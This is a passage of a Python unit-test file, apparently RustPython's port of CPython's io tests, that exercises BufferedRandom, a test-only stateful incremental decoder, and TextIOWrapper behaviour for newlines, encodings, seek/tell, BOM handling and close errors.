@unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_flush_error_on_close(self):
super().test_flush_error_on_close()
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
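    # State round-trip sketch: immediately after reset(), i == o == 1, so
    # getstate() returns (b'', 0) since (1 ^ 1) * 100 + (1 ^ 1) == 0, and
    # setstate((b'', 0)) restores i == o == 1 with an empty buffer.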
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
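    # Padding/truncation walkthrough (see the I=0, O=6 case in
    # StatefulIncrementalDecoderTest): with o == 6, the word b'xyz' is
    # padded to 'xyz---.' while b'toolongtofit' is truncated to 'toolon.'.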
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the decoder defined above for testing.
# It is disabled by default; tests enable it as needed.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
os_helper.unlink(os_helper.TESTFN)
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
self.assertFalse(t.write_through)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw)
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_reconfigure_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=False)
t.write("AB\nC")
self.assertEqual(r.getvalue(), b"")
t.reconfigure(line_buffering=True) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nC")
t.write("DEF\nG")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.write("H")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.reconfigure(line_buffering=False) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
t.write("IJ")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
# Keeping default value
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, False)
t.reconfigure(line_buffering=True)
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, True)
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
            # Try to get a user-preferred encoding different from the current
            # locale encoding, to check that TextIOWrapper() uses the current
            # locale encoding and not the user-preferred encoding.
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
        # Check that the encoding attribute is always set and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
# TODO: RUSTPYTHON, sys.unraisablehook
@unittest.expectedFailure
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.TextIOWrapper(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(os_helper.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(os_helper.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(os_helper.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(os_helper.TESTFN, "wb") as f:
f.write(line*2)
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(os_helper.TESTFN, "wb") as f:
f.write(data)
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
        # Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(os_helper.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(os_helper.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(os_helper.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_multibyte_seek_and_tell(self):
f = self.open(os_helper.TESTFN, "w", encoding="euc_jp")
f.write("AB\n\u3046\u3048\n")
f.close()
f = self.open(os_helper.TESTFN, "r", encoding="euc_jp")
self.assertEqual(f.readline(), "AB\n")
p0 = f.tell()
self.assertEqual(f.readline(), "\u3046\u3048\n")
p1 = f.tell()
f.seek(p0)
self.assertEqual(f.readline(), "\u3046\u3048\n")
self.assertEqual(f.tell(), p1)
f.close()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_seek_with_encoder_state(self):
f = self.open(os_helper.TESTFN, "w", encoding="euc_jis_2004")
f.write("\u00e6\u0300")
p0 = f.tell()
f.write("\u00e6")
f.seek(p0)
f.write("\u0300")
f.close()
f = self.open(os_helper.TESTFN, "r", encoding="euc_jis_2004")
self.assertEqual(f.readline(), "\u00e6\u0300\u0300")
f.close()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = os_helper.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_seek_bom(self):
# Same test, but when seeking manually
filename = os_helper.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = os_helper.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(os_helper.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(os_helper.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(os_helper.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(os_helper.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
